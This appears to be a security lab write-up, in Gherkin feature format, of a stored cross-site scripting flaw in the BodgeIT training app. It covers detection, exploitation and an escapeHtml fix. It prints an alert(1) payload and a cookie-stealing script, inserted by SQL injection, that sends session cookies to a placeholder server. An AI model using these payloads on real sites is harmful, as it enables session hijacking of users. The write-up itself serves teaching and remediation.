## Version 1.4.1
## language: en

Feature:
  TOE:
    BodgeIT
  Category:
    Injection Flaws
  Location:
    bodgeit/product.jsp - (Page Output)
  CWE:
    CWE-0079: Improper Neutralization of Input During Web Page Generation
    ('Cross-site Scripting') -base-
      https://cwe.mitre.org/data/definitions/79.html
    CWE-0074: Improper Neutralization of Special Elements in Output Used by a
    Downstream Component ('Injection') -class-
      https://cwe.mitre.org/data/definitions/74.html
    CWE-1019: Validate Inputs
      https://cwe.mitre.org/data/definitions/1019.html
  CAPEC:
    CAPEC-592: Stored XSS -detailed-
      http://capec.mitre.org/data/definitions/592.html
    CAPEC-063: Cross-Site Scripting (XSS) -standard-
      http://capec.mitre.org/data/definitions/63.html
    CAPEC-242: Code Injection -meta-
      http://capec.mitre.org/data/definitions/242.html
  Rule:
    REQ.173: https://fluidattacks.com/web/en/rules/173/
  Goal:
    Inject malicious code into a product description
  Recommendation:
    Sanitize everything before outputting, don't trust your own data

  Background:
  Hacker's software:
    | <Software name>       | <Version> |
    | Kali Linux            | 2017.3    |
    | Firefox Quantum       | 64.0b14   |
    | Burp Suite CE         | 1.7.36    |
  TOE information:
    Given I am running BodgeIT in a docker container at
    """
    http://localhost:8000/bodgeit/
    """

  Scenario: Normal use case
  Normal site navigation
    Given I go to http://localhost:8000/bodgeit/product.jsp
    Then I can see product details

  Scenario: Static detection
  No sanitization before output
    When I look at the code at "/bodgeit/root/password.jsp"
    """
    ...
    78  out.println("<h3>Description</h3>");
        79  out.println(rs.getString("desc"));
    ...
    """
    Then I see it's rendering data exactly as it is in the database

  Scenario: Dynamic detection
  SQL injection
    Given I have identified an SQL injection vector
    And extracted enough data from the DB to be able to modify it
    Then I update a product description with an XSS payload
    """
    UPDATE PRODUCTS SET DESC='<script>alert(1)</script>' WHERE NAME='Mindblank'
    """
    Then I go to the "Mindblank" product details
    Then I get an alert (evidence)[alert.png]

  Scenario: Exploitation
  Getting users session cookies
    Given I store a cookie stealing payload in a products description
    """
    UPDATE PRODUCTS SET DESC='<script>document.location="http://myserver/?c="
    +document.cookie</script>' WHERE NAME='Mindblank'
    """
    Then when a user goes to see the details of that product I get their cookies

  Scenario: Remediation
  Sanitization before output
    Given I patch the code as follows
    """
    import static org.apache.commons.lang.StringEscapeUtils.escapeHtml;
    ...
    78  out.println("<h3>Description</h3>");
        79  out.println(escapeHtml(rs.getString("desc")));
    ...
    """
    Then XSS from the database isn't posible anymore

  Scenario: Scoring
  Severity scoring according to CVSSv3 standard
  Base: Attributes that are constants over time and organizations
    8.1/10 (High) - AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/
  Temporal: Attributes that measure the exploit's popularity and fixability
    7.5/10 (High) - E:F/RL:O/RC:C/
  Environmental: Unique and relevant attributes to a specific user environment
    7.5/10 (High) - CR:M/IR:M/AR:M

  Scenario: Correlations
    0089-*
      Given I have an SQLi vector
      Then I can change product data
      And execute XSS attacks from there

